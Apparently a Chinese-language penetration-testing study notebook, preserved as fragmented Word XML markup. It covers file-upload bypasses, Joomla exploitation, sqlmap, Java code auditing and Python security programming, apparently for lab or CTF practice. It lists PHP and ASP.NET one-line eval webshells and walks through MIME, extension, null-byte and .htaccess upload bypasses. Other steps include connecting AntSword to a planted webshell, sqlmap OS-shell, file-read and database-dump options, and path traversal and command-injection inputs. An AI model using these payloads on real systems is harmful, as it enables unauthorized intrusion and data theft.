        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5263515" cy="1936115"/>
            <wp:effectExtent l="0" t="0" r="952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之后Payload Sets也要选择这两个，并且都配置好Payload Options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52725"/>
            <wp:effectExtent l="0" t="0" r="3175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5" w:name="_Toc30777"/>
      <w:bookmarkStart w:id="16" w:name="_Toc29475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3.配合AntSword（中国蚁剑）文件上传</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
      <w:bookmarkEnd w:id="1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上传正常图片和一句话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 Burpsuite 的 Proxy-&gt;Intercept 将抓包的状态从关闭改为打开。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20690" cy="3613785"/>
            <wp:effectExtent l="0" t="0" r="11430" b="13335"/>
            <wp:docPr id="36" name="图片 8" descr="IMG_263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6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一句话木马大全：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PHP：&lt;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?php eval($_POST[cc123]) ?&gt;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ASP.net:&lt;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%a=request(“zl”)%&gt;&lt;%eval a%&gt;</w:t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7" w:name="_Toc26853"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（一）文件类型验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1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在浏览器上传PHP文件，回到Burpsuite看到MIME信息（Content-type）为text/plain。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0345" cy="4368800"/>
            <wp:effectExtent l="0" t="0" r="3175" b="5080"/>
            <wp:docPr id="41" name="图片 9" descr="IMG_264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6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53355" cy="4410710"/>
            <wp:effectExtent l="0" t="0" r="4445" b="8890"/>
            <wp:docPr id="37" name="图片 10" descr="IMG_265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 descr="IMG_26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将Content-type后的内容修改为image/jpg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这样服务器就会认为这是一个图片文件了，接下来关闭抓包按钮，这样就成功的绕过MIME验证。上传成功后，我们需要访问文件，这时可直接复制文件路径（File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6055" cy="4714240"/>
            <wp:effectExtent l="0" t="0" r="6985" b="10160"/>
            <wp:docPr id="42" name="图片 11" descr="IMG_266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 descr="IMG_26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使用AntSword软件打开webshell地址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（也就是一句话木马的POST参数名）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，选择脚本类型为PHP，单击添加按钮，最后我们双击指定条目后的可以看到目标网站的目录，这样我们就成功获取到目标网站的WEBShell权限。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14620" cy="3540125"/>
            <wp:effectExtent l="0" t="0" r="12700" b="10795"/>
            <wp:docPr id="44" name="图片 12" descr="IMG_267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6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09540" cy="3533140"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="32" name="图片 13" descr="IMG_268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8595" cy="3519805"/>
            <wp:effectExtent l="0" t="0" r="4445" b="635"/>
            <wp:docPr id="38" name="图片 14" descr="IMG_269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eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc24111"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（二）内容验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1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打开Burpsuite抓包，进行截断浏览器给服务器发送的数据包，Proxy-HTTP history 找到上传图片的数据包，右键 选择Send to Repeater。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54040" cy="2955290"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="40" name="图片 2" descr="IMG_257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在末尾加上几个空格后粘贴一句话，然后修改文件名的尾缀为.php利于之后使用中国菜刀进行连接。空格的作用主要用于隔开图片文件和一句话，避免一句话解析混乱。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81015" cy="2881630"/>
            <wp:effectExtent l="0" t="0" r="12065" b="13970"/>
            <wp:docPr id="33" name="图片 3" descr="IMG_258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在图片末尾,添加一句话木马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@eval($_GET['a']);?&gt;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2898140"/>
            <wp:effectExtent l="0" t="0" r="10795" b="12700"/>
            <wp:docPr id="46" name="图片 4" descr="IMG_259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 descr="IMG_2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设置完成之后,（点击Send 发送数据包），上传数据,查看浏览器发现上传成功，复制File Name后面的信息（例如：uploadimg1412865875.php ）。粘贴复制到网站地址后面，从而构造访问地址（例如：http://www.test.comuploadimg1412865875.php ），并复制访问地址。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0505" cy="2623820"/>
            <wp:effectExtent l="0" t="0" r="8255" b="12700"/>
            <wp:docPr id="47" name="图片 5" descr="IMG_260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IMG_2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8125" cy="3589020"/>
            <wp:effectExtent l="0" t="0" r="635" b="7620"/>
            <wp:docPr id="48" name="图片 6" descr="IMG_261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 descr="IMG_2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001645"/>
            <wp:effectExtent l="0" t="0" r="635" b="635"/>
            <wp:docPr id="39" name="图片 7" descr="IMG_262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50510" cy="2896870"/>
            <wp:effectExtent l="0" t="0" r="13970" b="13970"/>
            <wp:docPr id="30" name="图片 8" descr="IMG_263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 descr="IMG_2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提示：如果访问构造好的一句话木马地址报错，可能是因为图片内容影响了一句话木马， 也可以在桌面新建php文件。在里面写入两行内容：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GIF89a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直接上传即可。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5900" cy="3100070"/>
            <wp:effectExtent l="0" t="0" r="7620" b="8890"/>
            <wp:docPr id="34" name="图片 9" descr="IMG_264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98135" cy="2717800"/>
            <wp:effectExtent l="0" t="0" r="12065" b="10160"/>
            <wp:docPr id="35" name="图片 10" descr="IMG_265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1455" cy="3402965"/>
            <wp:effectExtent l="0" t="0" r="12065" b="10795"/>
            <wp:docPr id="29" name="图片 11" descr="IMG_266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2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3521075"/>
            <wp:effectExtent l="0" t="0" r="10795" b="14605"/>
            <wp:docPr id="43" name="图片 12" descr="IMG_267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 descr="IMG_2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4155" cy="3111500"/>
            <wp:effectExtent l="0" t="0" r="14605" b="12700"/>
            <wp:docPr id="45" name="图片 13" descr="IMG_268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9" w:name="_Toc22677"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>后缀名验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1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php语言除了可以解析以php为后缀的文件，还可以解析php2，php3、php4、php5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、phar、pht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这些后缀的文件。我们可以将文件名修改为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这些后缀依次测试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重新上传。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4315" cy="2564130"/>
            <wp:effectExtent l="0" t="0" r="4445" b="11430"/>
            <wp:docPr id="50" name="图片 1" descr="IMG_256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5105" cy="2860040"/>
            <wp:effectExtent l="0" t="0" r="3175" b="5080"/>
            <wp:docPr id="49" name="图片 2" descr="IMG_257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0815" cy="2866390"/>
            <wp:effectExtent l="0" t="0" r="6985" b="13970"/>
            <wp:docPr id="52" name="图片 3" descr="IMG_258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7800" cy="2887345"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="53" name="图片 4" descr="IMG_259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当使用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某个后缀名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20202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5420" cy="2752090"/>
            <wp:effectExtent l="0" t="0" r="7620" b="6350"/>
            <wp:docPr id="54" name="图片 5" descr="IMG_260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IMG_2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7640" cy="2714625"/>
            <wp:effectExtent l="0" t="0" r="10160" b="13335"/>
            <wp:docPr id="55" name="图片 6" descr="IMG_261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 descr="IMG_26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右键空白处，点击添加数据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4888230" cy="3273425"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3175"/>
            <wp:docPr id="56" name="图片 7" descr="IMG_262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 descr="IMG_26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3045" cy="3446780"/>
            <wp:effectExtent l="0" t="0" r="5715" b="12700"/>
            <wp:docPr id="51" name="图片 8" descr="IMG_263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 descr="IMG_26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点击添加,成功添加一句话木马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23840" cy="3348990"/>
            <wp:effectExtent l="0" t="0" r="10160" b="3810"/>
            <wp:docPr id="57" name="图片 9" descr="IMG_264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IMG_26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76520" cy="3357245"/>
            <wp:effectExtent l="0" t="0" r="5080" b="10795"/>
            <wp:docPr id="31" name="图片 10" descr="IMG_265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20" w:name="_Toc2563"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>空字节截断目录路径</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20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打开BurpSuite抓包，进行截断浏览器给服务器发送的数据包，Proxy-&gt;Intercept 点击 intercept off 改为intercept on，截断的数据包将在关闭抓包的时候发送给服务端。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61915" cy="2812415"/>
            <wp:effectExtent l="0" t="0" r="4445" b="6985"/>
            <wp:docPr id="64" name="图片 11" descr="IMG_256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点击上传图片抓到包之后，可以看到，filename 后面即是上传的路径，uploading则是保存在服务器上的地址。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568065"/>
            <wp:effectExtent l="0" t="0" r="635" b="13335"/>
            <wp:docPr id="62" name="图片 12" descr="IMG_257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 descr="IMG_25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3835" cy="3355975"/>
            <wp:effectExtent l="0" t="0" r="4445" b="12065"/>
            <wp:docPr id="65" name="图片 13" descr="IMG_258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 descr="IMG_25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将uploadimg改为uploadimg/1.php .jpg ，并选中空格` ,接着我们来到 这个右边，修改code编码，找到同一行的数字20，改为00点击Apply changes`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9390" cy="3032125"/>
            <wp:effectExtent l="0" t="0" r="8890" b="635"/>
            <wp:docPr id="66" name="图片 14" descr="IMG_259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 descr="IMG_25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20(空格字符的16进制)改成00(截断字符的16进制）这样以来。截断字符后面的都会被截断，也就是忽略掉了，所以uploadimg/1.php .jpg 就变成了uploadimg/1.php 达到了上传PHP文件的目的。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4470" cy="2912110"/>
            <wp:effectExtent l="0" t="0" r="3810" b="13970"/>
            <wp:docPr id="63" name="图片 15" descr="IMG_260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 descr="IMG_26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将数据包中的内容删除，并修改上传内容，将数据包中的内容修改为一句话木马，点击发送Forward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删除前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210" cy="3175000"/>
            <wp:effectExtent l="0" t="0" r="6350" b="10160"/>
            <wp:docPr id="74" name="图片 16" descr="IMG_261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 descr="IMG_26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删除后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2804160"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="72" name="图片 17" descr="IMG_262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 descr="IMG_26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修改内容，注意：修改的内容在第二行输入木马才是生效的如图所示：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868930"/>
            <wp:effectExtent l="0" t="0" r="5715" b="11430"/>
            <wp:docPr id="68" name="图片 18" descr="IMG_263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IMG_26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70195" cy="2923540"/>
            <wp:effectExtent l="0" t="0" r="9525" b="2540"/>
            <wp:docPr id="70" name="图片 19" descr="IMG_264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 descr="IMG_26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修改完成后，发送数据包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3675" cy="2904490"/>
            <wp:effectExtent l="0" t="0" r="14605" b="6350"/>
            <wp:docPr id="71" name="图片 20" descr="IMG_265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 descr="IMG_26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返回浏览器，查看发送的数据包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9705" cy="3113405"/>
            <wp:effectExtent l="0" t="0" r="13335" b="10795"/>
            <wp:docPr id="73" name="图片 21" descr="IMG_266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6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可以看到上传成功，地址为uploading/1.php.jpg。复制这段内容uploadimg/1.php并访问，访问成功表示一句话上传成功。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3173730"/>
            <wp:effectExtent l="0" t="0" r="3175" b="11430"/>
            <wp:docPr id="75" name="图片 22" descr="IMG_267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 descr="IMG_2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204210"/>
            <wp:effectExtent l="0" t="0" r="6350" b="11430"/>
            <wp:docPr id="67" name="图片 23" descr="IMG_268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 descr="IMG_26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打开AntSword软件并填入复制的访问地址，填入设定的密码,这里设置的密码是a，选择连接类型为PHP，单击添加按钮，最后双击指定条目后的可以看到目标网站的目录，这样就成功获取到目标网站的WEBShell权限。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904490"/>
            <wp:effectExtent l="0" t="0" r="5715" b="6350"/>
            <wp:docPr id="69" name="图片 24" descr="IMG_269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 descr="IMG_26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打开中国蚁剑，右键选择添加数据，并将一句话木马地址复制进去。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2085" cy="3229610"/>
            <wp:effectExtent l="0" t="0" r="5715" b="1270"/>
            <wp:docPr id="60" name="图片 25" descr="IMG_270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 descr="IMG_27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845" cy="3517265"/>
            <wp:effectExtent l="0" t="0" r="5715" b="3175"/>
            <wp:docPr id="61" name="图片 26" descr="IMG_271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 descr="IMG_27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409315"/>
            <wp:effectExtent l="0" t="0" r="6350" b="4445"/>
            <wp:docPr id="59" name="图片 27" descr="IMG_272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 descr="IMG_27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1290" cy="2870835"/>
            <wp:effectExtent l="0" t="0" r="1270" b="9525"/>
            <wp:docPr id="58" name="图片 28" descr="IMG_273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7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最终获取了 Webshell</w:t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21" w:name="_Toc17801"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>上传路径验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21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在Burp Suite抓包之后，可以修改上传文件的保存路径来绕过文件上传路径过滤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017135"/>
            <wp:effectExtent l="0" t="0" r="5080" b="12065"/>
            <wp:docPr id="77" name="图片 77" descr="屏幕截图 2023-06-23 1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3-06-23 1754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接下来步骤与上面相同</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc20092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/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.htaccess文件绕过检测</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22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编写.htaccess文件。打开记事本，将如下代码写入文本中：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AddType  application/x-httpd-php    .jpg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然后点击文件选中另存为，编写文件名为.htaccess，选择保存类型为所有文件。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27320" cy="3672205"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="8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 descr="IMG_2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300980" cy="3883660"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="9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IMG_25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8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4092575"/>
            <wp:effectExtent l="0" t="0" r="1270" b="6985"/>
            <wp:docPr id="7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 descr="IMG_25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0500" cy="5813425"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="8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.htaccess文件里的代码的含义 是 将上传的文件后缀名为.jpg格式的文件以 php格式来解析文件。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55260" cy="3542665"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="7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 descr="IMG_26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将.htaccess文件进行上传,上传成功。使用BURP 抓包将.htaccess.txt 修改为.htaccess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4310" cy="3653155"/>
            <wp:effectExtent l="0" t="0" r="13970" b="4445"/>
            <wp:docPr id="8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6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72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.htaccess是apache服务器中的一个配置文件,不是上传的文件的黑名单之内 ,所以.htaccess文件是可以上传成功。把一句话文件的后缀名为yijuhua.php改为后缀名为jpg格式 。上传成功到服务器的.htaccess文件里的代码可以让 .jpg后缀名文件格式的文件名以 php格式解析 所以我们把yijuhua.php文件的后缀名改为.jpg格式,让.htaccess文件解析 yijuhua.jpg文件里的php代码 ,使木马上传成功。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67325" cy="3233420"/>
            <wp:effectExtent l="0" t="0" r="5715" b="12700"/>
            <wp:docPr id="8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 descr="IMG_26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39385" cy="4692650"/>
            <wp:effectExtent l="0" t="0" r="3175" b="1270"/>
            <wp:docPr id="8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 descr="IMG_26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上传成功之后,复制上传路径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打开桌面AntSword软件并填入复制的访问地址，填入设定的密码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选择脚本类型为PHP，单击添加按钮，最后双击指定条目后的可以看到目标网站的目录，这样就成功获取到目标网站的WEBShell权限。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08270" cy="3329940"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:docPr id="8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 descr="IMG_26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在空白处点击鼠标右键 选择添加。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187950" cy="3733165"/>
            <wp:effectExtent l="0" t="0" r="8890" b="635"/>
            <wp:docPr id="9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 descr="IMG_26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访问木马地址,复制链接然后输入上传一句话里文件里设置的密码为 a,选择相应的脚本类型,这里上传的是php脚本 点击添加。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3488690"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1270"/>
            <wp:docPr id="8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 descr="IMG_26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双击点击打开地址,连接成功,可以成功看到 uploadimg文件夹下有一个 key文件。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3040" cy="3954780"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="8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 descr="IMG_26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右键点击编辑 可以看到字符串 说明一句话木马上传成功。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86375" cy="3601720"/>
            <wp:effectExtent l="0" t="0" r="1905" b="10160"/>
            <wp:docPr id="82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 descr="IMG_27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3" w:name="_Toc5718"/>
      <w:bookmarkStart w:id="24" w:name="_Toc16448"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Joomla</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
      <w:bookmarkEnd w:id="24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查找漏洞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信息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4625340"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="76" name="图片 76" descr="屏幕截图 2023-06-24 1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3-06-24 13532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210" w:leftChars="100" w:right="0" w:firstLine="210" w:firstLineChars="10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使用方式：先在cmd运行msfconsole指令，打开msfs后输入search joomla，注意带registration的部分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770" cy="3476625"/>
            <wp:effectExtent l="0" t="0" r="1270" b="13335"/>
            <wp:docPr id="83" name="图片 83" descr="屏幕截图 2023-06-24 14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屏幕截图 2023-06-24 1409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输入use 上面白色区域代码，即可打开joomla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733800" cy="396240"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="92" name="图片 92" descr="屏幕截图 2023-06-24 14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3-06-24 1413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输入search CVE-2015-7297 查看到一处存在可SQL注入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1403985"/>
            <wp:effectExtent l="0" t="0" r="3810" b="13335"/>
            <wp:docPr id="94" name="图片 94" descr="屏幕截图 2023-06-24 14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3-06-24 14274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5" w:name="_Toc18316"/>
      <w:bookmarkStart w:id="26" w:name="_Toc18522"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Sqlmap</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
      <w:bookmarkEnd w:id="2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在kali中，输入sqlmap -u url地址查看存在GET请求参数的检测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30140" cy="2331720"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="95" name="图片 95" descr="屏幕截图 2023-06-24 1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3-06-24 1620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--data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查看存在POST请求参数的检测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23460" cy="2331720"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="96" name="图片 96" descr="屏幕截图 2023-06-24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3-06-24 1626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--cookie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查看存在cookie参数的检测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2301240"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="97" name="图片 97" descr="屏幕截图 2023-06-24 16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3-06-24 1633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获取数据库名称：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--dbs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获取当前所在数据库信息：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--current-db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获取当前数据库所有表信息：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--tables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获取当前数据表所有列信息：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--columns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获取当前表多个数据字段所有数据信息：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--dump -C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列名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（这里会提示是否对其中哈希值进行进一步破解，再之后会提示是否根据字典破解）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获取当前数据库数据量信息：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--count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获取当前用户权限信息：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--privileges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连接数据库：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对数据库SQL执行管理：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--sql-shell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(之后可以进行SQL操作了，比如@@version：查看数据库版本)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延时注入：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-safe-freq或者sqlmap.py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-delay 1（延时1秒）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获取用户：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--os-cmd-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net user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，之后选择网站类型和保存文件位置，分别输入对应数字即可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写Webshell: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 -shell，之后选择语言类型对应数字，之后选择2，之后输入保存文件路径，之后不输入按回车即可得到写Webshell的文件路径，可在浏览器访问，之后输入net user可以查看信息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大小写注入：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--tamper=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randomcase.py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批量检测（这里request的请求集合文件路径可由BurpSuite的Logging功能得到，具体见BurpSuite部分笔记）：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sqlmap.py -l request的请求集合文件路径 --batch -smart（batch：自动选择yes，smart：启发式快速判断，节约时间）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注入显示信息级别：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-v 3（-v后数字从0-6依次显示更多信息）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利用本地burpsuite截取的请求爆库：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文件内容类似：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object>
          <v:shape id="_x0000_i1025" o:spt="75" type="#_x0000_t75" style="height:35pt;width:25.85pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId152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51">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:objec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爆库（表，字段，内容同理）：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--dbs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4861560" cy="2750820"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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69180" cy="2141220"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="1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如果存在已知的存在漏洞的参数名，需要改为：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-p 参数名 --dbs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="2134870"/>
            <wp:effectExtent l="0" t="0" r="1905" b="1397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3875"/>
            <wp:effectExtent l="0" t="0" r="3810" b="4445"/>
            <wp:docPr id="1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爆flag文件内容：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 -r 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文件名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--file-read "/flag" --dbms mysql</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="2236470"/>
            <wp:effectExtent l="0" t="0" r="1905" b="3810"/>
            <wp:docPr id="1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62990"/>
            <wp:effectExtent l="0" t="0" r="3810" b="381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7" w:name="_Toc7012"/>
      <w:bookmarkStart w:id="28" w:name="_Toc21652"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
      <w:bookmarkEnd w:id="2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正向跟踪：搜索request.getParameter、HttpServletRequest、RequestMapping、request.getPart等获取输入数据的地方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9" w:name="_Toc23204"/>
      <w:bookmarkStart w:id="30" w:name="_Toc29494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1.SQL注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
      <w:bookmarkEnd w:id="3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利用单引号闭合注入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1" w:name="_Toc16168"/>
      <w:bookmarkStart w:id="32" w:name="_Toc5215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2.命令执行漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
      <w:bookmarkEnd w:id="3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全局寻找网站代码中是否存在类似command等参数提供注入的地方（一般后续代码中包含cmd、bash等指令操作的代码）。使用BurpSuite截取POST请求，下方增加参数（假设叫command）：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command=whoami查看用户信息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command=ipconfig查看IP地址信息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33" w:name="_Toc29428"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（一）WSO2漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3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脚本如下，在burpsuite中拦截请求全选并粘贴使用，注意替换里面的HOST地址，之后放过拦截，会运行并生成上传authenticationendpoint/testshell.jsp文件，访问：URL地址前缀/authenticationendpoint/testshell.jsp得到上传cmd指令的网页，输入ls，cat /flag等指令得到信息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pt;width:40.05pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId160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59">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:objec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4" w:name="_Toc9017"/>
      <w:bookmarkStart w:id="35" w:name="_Toc9398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3.文件操作漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkEnd w:id="3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upload、download等参数提供注入的地方，使用BurpSuite截取文件下载请求，之后可以在路径前加入../../../../../../../../../切换到根目录，然后追加输入指定文件的目录位置可以下载指定路径的文件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6" w:name="_Toc8291"/>
      <w:bookmarkStart w:id="37" w:name="_Toc3884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4.代码注入漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
      <w:bookmarkEnd w:id="3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全局寻找网站代码中是否存在类似compile等参数提供注入的地方，使用BurpSuite截取文件下载请求，之后可以在参数输入文件操作指令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38" w:name="_Toc27688"/>
      <w:bookmarkStart w:id="39" w:name="_Toc22660"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc14205"/>
      <w:bookmarkStart w:id="41" w:name="_Toc4290"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>python安全应用编程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc8253"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（一）正则表达式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42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5pt;width:62.35pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId162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6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898775"/>
            <wp:effectExtent l="0" t="0" r="8255" b="12065"/>
            <wp:docPr id="100" name="图片 100" descr="屏幕截图 2023-07-01 22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3-07-01 22580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3" w:name="_Toc16819"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（二）Web编程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43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55.25pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId165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64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727835"/>
            <wp:effectExtent l="0" t="0" r="635" b="9525"/>
            <wp:docPr id="101" name="图片 101" descr="屏幕截图 2023-07-02 0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3-07-02 0001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202815"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="102" name="图片 102" descr="屏幕截图 2023-07-02 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3-07-02 0000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2385060"/>
            <wp:effectExtent l="0" t="0" r="8890" b="7620"/>
            <wp:docPr id="103" name="图片 103" descr="屏幕截图 2023-07-02 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07-02 00004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1294765"/>
            <wp:effectExtent l="0" t="0" r="6350" b="635"/>
            <wp:docPr id="104" name="图片 104" descr="屏幕截图 2023-07-02 13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07-02 13100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本地启一个Web服务，运行后可以使用ip端口带参数访问网址了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9" o:spt="75" type="#_x0000_t75" style="height:35pt;width:55.25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70">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:objec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75205"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1079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25240" cy="5692140"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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综合：爬虫获取网站多页制定内容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5420" cy="3053715"/>
            <wp:effectExtent l="0" t="0" r="7620" b="9525"/>
            <wp:docPr id="105" name="图片 105" descr="屏幕截图 2023-07-02 13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07-02 13333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851785"/>
            <wp:effectExtent l="0" t="0" r="1905" b="13335"/>
            <wp:docPr id="106" name="图片 106" descr="屏幕截图 2023-07-02 13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07-02 13341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4" w:name="_Toc22114"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（三）多线程(队列)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/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0" o:spt="75" type="#_x0000_t75" style="height:35pt;width:68.95pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId177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76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3070860"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="107" name="图片 107" descr="屏幕截图 2023-07-02 21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07-02 21193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5" w:name="_Toc18579"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（四）网络编程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45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首先查看kali的IP地址：cmd输入ifconfig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00600" cy="647700"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="108" name="图片 108" descr="屏幕截图 2023-07-02 22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07-02 22300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将客户端的python代码放到kali的Home文件夹下，并在cmd使用python 文件名启动（注意kali里的python文件不能有注释，否则报错）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1" o:spt="75" type="#_x0000_t75" style="height:35pt;width:87.7pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId181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180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1697355"/>
            <wp:effectExtent l="0" t="0" r="3175" b="9525"/>
